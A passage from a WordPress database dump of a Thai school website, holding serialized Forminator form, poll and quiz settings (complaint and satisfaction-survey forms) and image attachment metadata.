errors!\";}s:17:\"validation-inline\";s:1:\"1\";s:11:\"form-expire\";s:9:\"no_expire\";s:16:\"form-padding-top\";s:1:\"0\";s:18:\"form-padding-right\";s:1:\"0\";s:19:\"form-padding-bottom\";s:1:\"0\";s:17:\"form-padding-left\";s:1:\"0\";s:17:\"form-border-width\";s:1:\"0\";s:18:\"form-border-radius\";s:1:\"0\";s:23:\"cform-label-font-family\";s:6:\"Roboto\";s:25:\"cform-label-custom-family\";s:0:\"\";s:21:\"cform-label-font-size\";s:2:\"12\";s:23:\"cform-label-font-weight\";s:4:\"bold\";s:23:\"cform-title-font-family\";s:6:\"Roboto\";s:25:\"cform-title-custom-family\";s:0:\"\";s:21:\"cform-title-font-size\";s:2:\"45\";s:23:\"cform-title-font-weight\";s:6:\"normal\";s:22:\"cform-title-text-align\";s:4:\"left\";s:26:\"cform-subtitle-font-family\";s:6:\"Roboto\";s:26:\"cform-subtitle-custom-font\";s:0:\"\";s:24:\"cform-subtitle-font-size\";s:2:\"18\";s:26:\"cform-subtitle-font-weight\";s:6:\"normal\";s:25:\"cform-subtitle-text-align\";s:4:\"left\";s:23:\"cform-input-font-family\";s:6:\"Roboto\";s:23:\"cform-input-custom-font\";s:0:\"\";s:21:\"cform-input-font-size\";s:2:\"16\";s:23:\"cform-input-font-weight\";s:6:\"normal\";s:23:\"cform-radio-font-family\";s:6:\"Roboto\";s:23:\"cform-radio-custom-font\";s:0:\"\";s:21:\"cform-radio-font-size\";s:2:\"14\";s:23:\"cform-radio-font-weight\";s:6:\"normal\";s:24:\"cform-select-font-family\";s:6:\"Roboto\";s:26:\"cform-select-custom-family\";s:0:\"\";s:22:\"cform-select-font-size\";s:2:\"16\";s:24:\"cform-select-font-weight\";s:6:\"normal\";s:29:\"cform-multiselect-font-family\";s:6:\"Roboto\";s:29:\"cform-multiselect-custom-font\";s:0:\"\";s:27:\"cform-multiselect-font-size\";s:2:\"16\";s:29:\"cform-multiselect-font-weight\";s:6:\"normal\";s:33:\"cform-multiselect-tag-font-family\";s:6:\"Roboto\";s:33:\"cform-multiselect-tag-custom-font\";s:0:\"\";s:31:\"cform-multiselect-tag-font-size\";s:2:\"12\";s:33:\"cform-multiselect-tag-font-weight\";s:6:\"medium\";s:26:\"cform-dropdown-font-family\";s:6:\"Roboto\";s:26:\"cform-dropdown-custom-font\";s:0:\"\";s:24:\"cform-dropdown-font-size\";s:2:\"16\";s:26:\"cform-dropdown-font-weight\";s:6:\"normal\";s:26:\"cform-calendar-font-family\";s:6:\"Roboto\";s:26:\"cform-calendar-custom-font\";s:0:\"\";s:24:\"cform-calendar-font-size\";s:2:\"13\";s:26:\"cform-calendar-font-weight\";s:6:\"normal\";s:24:\"cform-button-font-family\";s:6:\"Roboto\";s:24:\"cform-button-custom-font\";s:0:\"\";s:22:\"cform-button-font-size\";s:2:\"14\";s:24:\"cform-button-font-weight\";s:3:\"500\";s:26:\"cform-timeline-font-family\";s:6:\"Roboto\";s:26:\"cform-timeline-custom-font\";s:0:\"\";s:24:\"cform-timeline-font-size\";s:2:\"12\";s:26:\"cform-timeline-font-weight\";s:6:\"normal\";s:28:\"cform-pagination-font-family\";s:0:\"\";s:28:\"cform-pagination-custom-font\";s:0:\"\";s:26:\"cform-pagination-font-size\";s:2:\"16\";s:28:\"cform-pagination-font-weight\";s:6:\"normal\";s:19:\"payment_require_ssl\";s:0:\"\";s:15:\"submission-file\";s:6:\"delete\";s:12:\"trigger_from\";s:7:\"builder\";s:13:\"template_type\";s:6:\"preset\";s:13:\"template_name\";s:12:\"Contact Form\";s:7:\"form_id\";s:4:\"1506\";s:9:\"form_name\";s:0:\"\";s:11:\"form_status\";s:7:\"publish\";s:18:\"notification_count\";i:2;s:15:\"previous_status\";s:7:\"publish\";s:13:\"sc_email_link\";s:1:\"1\";s:10:\"sc_message\";s:417:\"<p>Your form has been saved as draft and a resume link has been generated so you can return to the form anytime within {retention_period} days from today. Copy and save the link or enter your email address below to have the link sent to your mail.</p><p>These fields weren\'t saved to your submission draft: Paypal, Stripe, Signature, Password, Captcha, and Upload. Kindly fill them out before submitting the form.</p>\";}s:9:\"client_id\";N;s:22:\"integration_conditions\";a:0:{}s:9:\"behaviors\";a:1:{i:0;a:10:{s:4:\"slug\";s:18:\"behavior-1234-4567\";s:5:\"label\";s:0:\"\";s:14:\"autoclose-time\";s:2:\"10\";s:9:\"autoclose\";s:4:\"true\";s:6:\"newtab\";s:7:\"sametab\";s:16:\"thankyou-message\";s:259:\"<p>ขอบคุณสำหรับการแจ้งเรื่องร้องเรียน.<br>ทางเจ้าหน้าที่จะรีบดำเนินการ และติดต่อกลับโดยเร็ว</p>\";s:22:\"email-thankyou-message\";s:0:\"\";s:23:\"manual-thankyou-message\";s:0:\"\";s:20:\"submission-behaviour\";s:18:\"behaviour-thankyou\";s:12:\"redirect-url\";s:0:\"\";}}s:13:\"notifications\";a:2:{i:0;a:9:{s:4:\"slug\";s:22:\"notification-1234-4567\";s:5:\"label\";s:11:\"Admin Email\";s:16:\"email-recipients\";s:7:\"default\";s:10:\"recipients\";s:20:\"patcharapol@ro.ac.th\";s:13:\"email-subject\";s:47:\"New Form Entry #{submission_id} for {form_name}\";s:12:\"email-editor\";s:114:\"You have a new website form submission: <br /> {all_fields} <br />---<br /> This message was sent from {site_url}.\";s:16:\"email-attachment\";s:4:\"true\";s:4:\"type\";s:7:\"default\";s:10:\"conditions\";a:0:{}}i:1;a:9:{s:4:\"slug\";s:22:\"notification-7058-1000\";s:5:\"label\";s:12:\"School Email\";s:16:\"email-recipients\";s:7:\"default\";s:10:\"recipients\";s:26:\"33010169@sisaketedu1.go.th\";s:13:\"email-subject\";s:47:\"New Form Entry #{submission_id} for {form_name}\";s:12:\"email-editor\";s:114:\"You have a new website form submission: <br /> {all_fields} <br />---<br /> This message was sent from {site_url}.\";s:16:\"email-attachment\";s:4:\"true\";s:4:\"type\";s:7:\"default\";s:10:\"conditions\";a:0:{}}}}'),
(4185,1507,'title_style','default'),
(4186,1507,'_title_style','field_5d1a0217cf408'),
(4187,1508,'title_style','default'),
(4188,1508,'_title_style','field_5d1a0217cf408'),
(4189,1509,'_wp_attached_file','2025/07/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353-1.png'),
(4190,1509,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:353;s:4:\"file\";s:119:\"2025/07/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353-1.png\";s:8:\"filesize\";i:65682;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:119:\"ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353-1-300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16027;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:119:\"ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9420;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:119:\"ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353-1-768x265.png\";s:5:\"width\";i:768;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:52817;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:119:\"ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23162;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4192,1511,'title_style','hidden'),
(4193,1511,'_title_style','field_5d1a0217cf408'),
(4194,1513,'_wp_attached_file','2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png'),
(4195,1513,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:353;s:4:\"file\";s:104:\"2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\";s:8:\"filesize\";i:72906;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:104:\"ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1-300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18579;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:104:\"ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12367;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:104:\"ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1-768x265.png\";s:5:\"width\";i:768;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:61389;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:104:\"ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29868;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4196,1514,'title_style','hidden'),
(4197,1514,'_title_style','field_5d1a0217cf408'),
(4198,1516,'forminator_form_meta','a:6:{s:6:\"fields\";a:5:{i:0;a:11:{s:2:\"id\";s:8:\"answer-1\";s:10:\"element_id\";s:8:\"answer-1\";s:7:\"form_id\";N;s:12:\"parent_group\";s:0:\"\";s:5:\"title\";s:39:\"พอใจมากที่สุด\";s:5:\"color\";s:0:\"\";s:12:\"answer_image\";s:58:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/1.png\";s:21:\"answer_image_filename\";s:5:\"1.png\";s:16:\"answer_image_alt\";s:0:\"\";s:9:\"use_extra\";s:0:\"\";s:5:\"extra\";s:0:\"\";}i:1;a:9:{s:2:\"id\";s:8:\"answer-2\";s:10:\"element_id\";s:8:\"answer-2\";s:7:\"form_id\";N;s:12:\"parent_group\";s:0:\"\";s:5:\"title\";s:21:\"พอใจมาก\";s:5:\"color\";s:0:\"\";s:12:\"answer_image\";s:58:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/2.png\";s:21:\"answer_image_filename\";s:5:\"2.png\";s:16:\"answer_image_alt\";s:0:\"\";}i:2;a:9:{s:2:\"id\";s:8:\"answer-3\";s:10:\"element_id\";s:8:\"answer-3\";s:7:\"form_id\";N;s:12:\"parent_group\";s:0:\"\";s:5:\"title\";s:12:\"พอใจ\";s:5:\"color\";s:0:\"\";s:12:\"answer_image\";s:58:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/3.png\";s:21:\"answer_image_filename\";s:5:\"3.png\";s:16:\"answer_image_alt\";s:0:\"\";}i:3;a:9:{s:2:\"id\";s:8:\"answer-4\";s:10:\"element_id\";s:8:\"answer-4\";s:7:\"form_id\";N;s:12:\"parent_group\";s:0:\"\";s:5:\"title\";s:45:\"ค่อนข้างไม่พอใจ\";s:5:\"color\";s:0:\"\";s:12:\"answer_image\";s:58:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/4.png\";s:21:\"answer_image_filename\";s:5:\"4.png\";s:16:\"answer_image_alt\";s:0:\"\";}i:4;a:9:{s:2:\"id\";s:8:\"answer-5\";s:10:\"element_id\";s:8:\"answer-5\";s:7:\"form_id\";N;s:12:\"parent_group\";s:0:\"\";s:5:\"title\";s:30:\"ไม่พอใจเลย\";s:5:\"color\";s:0:\"\";s:12:\"answer_image\";s:58:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5.png\";s:21:\"answer_image_filename\";s:5:\"5.png\";s:16:\"answer_image_alt\";s:0:\"\";}}s:8:\"settings\";a:37:{s:7:\"answers\";a:0:{}s:8:\"settings\";a:5:{s:8:\"formName\";s:96:\"ประเมินความพึงพอใจในการรับบริการ\";s:7:\"version\";s:6:\"1.44.1\";s:22:\"admin-email-recipients\";a:1:{i:0;s:20:\"patcharapol@ro.ac.th\";}s:17:\"admin-email-title\";s:35:\"New Poll submission for {poll_name}\";s:18:\"admin-email-editor\";s:195:\"You have a new poll submission: &lt;br/&gt;&lt;br/&gt;{poll_answer}&lt;br/&gt;&lt;br/&gt;Current results: &lt;br/&gt;{poll_result} &lt;br/&gt;---&lt;br/&gt; This message was sent from {site_url}.\";}s:18:\"akismet-protection\";s:1:\"1\";s:8:\"formName\";s:96:\"ประเมินความพึงพอใจในการรับบริการ\";s:7:\"version\";s:6:\"1.44.1\";s:17:\"store_submissions\";s:1:\"1\";s:7:\"form_id\";s:4:\"1516\";s:9:\"form_name\";s:0:\"\";s:11:\"form_status\";s:7:\"publish\";s:13:\"poll-question\";s:120:\"ผู้รับบริการมีความพึงพอในกับการรับบริการ\";s:10:\"poll-image\";s:0:\"\";s:19:\"poll-image_filename\";s:0:\"\";s:14:\"poll-image_alt\";s:0:\"\";s:13:\"enable_images\";s:1:\"1\";s:17:\"poll-button-label\";s:72:\"ส่งการประเมินความพึงพอใจ\";s:13:\"results-behav\";s:10:\"show_after\";s:15:\"previous_status\";s:7:\"publish\";s:15:\"use-admin-email\";s:1:\"1\";s:22:\"admin-email-recipients\";a:0:{}s:22:\"admin-email-cc-address\";a:0:{}s:23:\"admin-email-bcc-address\";a:0:{}s:21:\"admin-email-from-name\";s:9:\"{user_ip}\";s:11:\"poll-colors\";s:4:\"true\";s:12:\"visual_style\";s:4:\"grid\";s:14:\"poll-grid-cols\";s:1:\"2\";s:18:\"enable-votes-limit\";s:4:\"true\";s:19:\"enable-votes-method\";s:14:\"browser_cookie\";s:13:\"results-style\";s:3:\"pie\";s:22:\"forminator-poll-design\";s:7:\"default\";s:14:\"buttonbg_hover\";s:7:\"#006b05\";s:15:\"buttonbg_active\";s:7:\"#ff9900\";s:10:\"box_border\";s:7:\"#17a8e3\";s:16:\"field-image-size\";s:4:\"auto\";s:17:\"opening_close_msg\";s:99:\"ขอบคุณสำหรับการประเมินความพึงพอใจ\";s:13:\"poll_question\";s:7:\"#c4c4c4\";s:7:\"inputbo\";s:7:\"#33ed00\";s:7:\"inputbg\";s:7:\"#ed0000\";}s:9:\"client_id\";N;s:22:\"integration_conditions\";a:0:{}s:9:\"behaviors\";a:0:{}s:13:\"notifications\";a:0:{}}'),
(4199,1517,'_wp_attached_file','2025/07/ประเมิน-1024x353-1.jpg'),
(4200,1517,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:353;s:4:\"file\";s:44:\"2025/07/ประเมิน-1024x353-1.jpg\";s:8:\"filesize\";i:75931;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:44:\"ประเมิน-1024x353-1-300x103.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8270;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:44:\"ประเมิน-1024x353-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5017;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:44:\"ประเมิน-1024x353-1-768x265.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28053;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:44:\"ประเมิน-1024x353-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12712;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(4201,1518,'_wp_attached_file','2025/07/1.png'),
(4202,1518,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:126;s:6:\"height\";i:126;s:4:\"file\";s:13:\"2025/07/1.png\";s:8:\"filesize\";i:15475;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4203,1519,'_wp_attached_file','2025/07/2.png'),
(4204,1519,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:118;s:6:\"height\";i:121;s:4:\"file\";s:13:\"2025/07/2.png\";s:8:\"filesize\";i:15001;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4205,1520,'_wp_attached_file','2025/07/3.png'),
(4206,1520,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:117;s:6:\"height\";i:118;s:4:\"file\";s:13:\"2025/07/3.png\";s:8:\"filesize\";i:12169;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4207,1521,'_wp_attached_file','2025/07/4.png'),
(4208,1521,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:121;s:6:\"height\";i:118;s:4:\"file\";s:13:\"2025/07/4.png\";s:8:\"filesize\";i:13987;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4209,1522,'_wp_attached_file','2025/07/5.png'),
(4210,1522,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:115;s:6:\"height\";i:115;s:4:\"file\";s:13:\"2025/07/5.png\";s:8:\"filesize\";i:13566;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4211,1523,'_edit_lock','1751345814:1'),
(4212,1524,'_wp_attached_file','2025/07/ประเมิน-1024x353-1-1.jpg'),
(4213,1524,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:353;s:4:\"file\";s:46:\"2025/07/ประเมิน-1024x353-1-1.jpg\";s:8:\"filesize\";i:75931;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"ประเมิน-1024x353-1-1-300x103.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8270;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:46:\"ประเมิน-1024x353-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5017;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:46:\"ประเมิน-1024x353-1-1-768x265.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28053;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:46:\"ประเมิน-1024x353-1-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12712;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(4214,1523,'_edit_last','1'),
(4215,1523,'title_style','hidden'),
(4216,1523,'_title_style','field_5d1a0217cf408'),
(4217,1525,'title_style','hidden'),
(4218,1525,'_title_style','field_5d1a0217cf408'),
(4219,1526,'title_style','default'),
(4220,1526,'_title_style','field_5d1a0217cf408'),
(4221,1528,'forminator_form_meta','a:9:{s:6:\"fields\";a:0:{}s:8:\"settings\";a:116:{s:20:\"page-indicator-color\";s:7:\"#888888\";s:30:\"start-button-background-static\";s:7:\"#17A8E3\";s:29:\"start-button-background-hover\";s:7:\"#008FCA\";s:30:\"start-button-background-active\";s:7:\"#008FCA\";s:25:\"start-button-color-static\";s:7:\"#FFFFFF\";s:24:\"start-button-color-hover\";s:7:\"#FFFFFF\";s:25:\"start-button-color-active\";s:7:\"#FFFFFF\";s:24:\"start-button-font-family\";s:6:\"Roboto\";s:22:\"start-button-font-size\";s:2:\"14\";s:24:\"start-button-font-weight\";s:3:\"500\";s:35:\"navigation-button-background-static\";s:7:\"#1ABCA1\";s:34:\"navigation-button-background-hover\";s:7:\"#159C85\";s:35:\"navigation-button-background-active\";s:7:\"#159C85\";s:30:\"navigation-button-color-static\";s:7:\"#FFFFFF\";s:29:\"navigation-button-color-hover\";s:7:\"#FFFFFF\";s:30:\"navigation-button-color-active\";s:7:\"#FFFFFF\";s:29:\"navigation-button-font-family\";s:6:\"Roboto\";s:27:\"navigation-button-font-size\";s:2:\"14\";s:29:\"navigation-button-font-weight\";s:3:\"500\";s:39:\"back-questions-button-background-static\";s:7:\"#1ABCA1\";s:38:\"back-questions-button-background-hover\";s:7:\"#159C85\";s:39:\"back-questions-button-background-active\";s:7:\"#159C85\";s:34:\"back-questions-button-color-static\";s:7:\"#FFFFFF\";s:33:\"back-questions-button-color-hover\";s:7:\"#FFFFFF\";s:34:\"back-questions-button-color-active\";s:7:\"#FFFFFF\";s:26:\"page-indicator-font-family\";s:6:\"Roboto\";s:24:\"page-indicator-font-size\";s:2:\"13\";s:26:\"page-indicator-font-weight\";s:3:\"400\";s:17:\"store_submissions\";s:1:\"1\";s:8:\"hasLeads\";s:0:\"\";s:8:\"formName\";s:125:\"แบบสอบถามความพึงพอใจ/ไม่พอใจ ในการรับบริการ\";s:7:\"version\";s:6:\"1.44.1\";s:22:\"admin-email-recipients\";a:1:{i:0;s:20:\"patcharapol@ro.ac.th\";}s:13:\"results_behav\";s:5:\"after\";s:12:\"visual_style\";s:4:\"grid\";s:21:\"forminator-quiz-theme\";s:7:\"default\";s:11:\"msg_correct\";s:29:\"Correct! It was %UserAnswer%.\";s:13:\"msg_incorrect\";s:39:\"Wrong! It was %CorrectAnswer%, sorry...\";s:9:\"msg_count\";s:34:\"You got %YourNum%/%Total% correct!\";s:22:\"nowrong-title-settings\";s:0:\"\";s:19:\"nowrong-title-color\";s:7:\"#333333\";s:25:\"nowrong-title-font-family\";s:6:\"Roboto\";s:23:\"nowrong-title-font-size\";s:2:\"42\";s:25:\"nowrong-title-font-weight\";s:3:\"500\";s:28:\"nowrong-description-settings\";s:0:\"\";s:25:\"nowrong-description-color\";s:7:\"#8C8C8C\";s:31:\"nowrong-description-font-family\";s:6:\"Roboto\";s:29:\"nowrong-description-font-size\";s:2:\"20\";s:31:\"nowrong-description-font-weight\";s:3:\"400\";s:22:\"nowrong-image-settings\";s:0:\"\";s:26:\"nowrong-image-border-color\";s:7:\"#000000\";s:26:\"nowrong-image-border-width\";s:1:\"0\";s:26:\"nowrong-image-border-style\";s:5:\"solid\";s:25:\"nowrong-question-settings\";s:0:\"\";s:26:\"nowrong-question-font-size\";s:2:\"24\";s:28:\"nowrong-question-font-family\";s:6:\"Roboto\";s:28:\"nowrong-question-font-weight\";s:3:\"700\";s:34:\"nowrong-question-description-color\";s:7:\"#8C8C8C\";s:32:\"question-description-font-family\";s:6:\"Roboto\";s:30:\"question-description-font-size\";s:2:\"20\";s:32:\"question-description-font-weight\";s:3:\"400\";s:23:\"nowrong-answer-settings\";s:0:\"\";s:28:\"nowrong-answer-border-static\";s:7:\"#EBEDEB\";s:27:\"nowrong-answer-border-hover\";s:7:\"#17A8E3\";s:28:\"nowrong-answer-border-active\";s:7:\"#17A8E3\";s:32:\"nowrong-answer-background-static\";s:7:\"#FAFAFA\";s:31:\"nowrong-answer-background-hover\";s:7:\"#F3FBFE\";s:32:\"nowrong-answer-background-active\";s:7:\"#F3FBFE\";s:27:\"nowrong-answer-chkbo-static\";s:7:\"#BFBFBF\";s:27:\"nowrong-answer-chkbo-active\";s:7:\"#17A8E3\";s:27:\"nowrong-answer-color-static\";s:7:\"#888888\";s:27:\"nowrong-answer-color-active\";s:7:\"#333333\";s:24:\"nowrong-answer-font-size\";s:2:\"14\";s:26:\"nowrong-answer-font-family\";s:6:\"Roboto\";s:26:\"nowrong-answer-font-weight\";s:3:\"500\";s:32:\"nowrong-submit-background-static\";s:7:\"#17A8E3\";s:31:\"nowrong-submit-background-hover\";s:7:\"#008FCA\";s:32:\"nowrong-submit-background-active\";s:7:\"#008FCA\";s:27:\"nowrong-submit-color-static\";s:7:\"#FFFFFF\";s:26:\"nowrong-submit-color-hover\";s:7:\"#FFFFFF\";s:27:\"nowrong-submit-color-active\";s:7:\"#FFFFFF\";s:26:\"nowrong-submit-font-family\";s:6:\"Roboto\";s:24:\"nowrong-submit-font-size\";s:2:\"14\";s:26:\"nowrong-submit-font-weight\";s:3:\"500\";s:30:\"nowrong-result-background-main\";s:7:\"#FAFAFA\";s:32:\"nowrong-result-background-header\";s:7:\"#FAFAFA\";s:27:\"nowrong-result-border-color\";s:7:\"#17A8E3\";s:25:\"nowrong-result-quiz-color\";s:7:\"#888888\";s:31:\"nowrong-result-quiz-font-family\";s:6:\"Roboto\";s:29:\"nowrong-result-quiz-font-size\";s:2:\"15\";s:31:\"nowrong-result-quiz-font-weight\";s:3:\"500\";s:33:\"nowrong-result-retake-font-family\";s:6:\"Roboto\";s:31:\"nowrong-result-retake-font-size\";s:2:\"13\";s:33:\"nowrong-result-retake-font-weight\";s:3:\"500\";s:39:\"nowrong-result-retake-background-static\";s:7:\"#222222\";s:38:\"nowrong-result-retake-background-hover\";s:7:\"#222222\";s:39:\"nowrong-result-retake-background-active\";s:7:\"#222222\";s:30:\"nowrong-result-background-body\";s:7:\"#EBEDEB\";s:26:\"nowrong-result-title-color\";s:7:\"#333333\";s:32:\"nowrong-result-title-font-family\";s:6:\"Roboto\";s:30:\"nowrong-result-title-font-size\";s:2:\"15\";s:32:\"nowrong-result-title-font-weight\";s:3:\"500\";s:32:\"nowrong-result-description-color\";s:7:\"#4D4D4D\";s:38:\"nowrong-result-description-font-family\";s:6:\"Roboto\";s:36:\"nowrong-result-description-font-size\";s:2:\"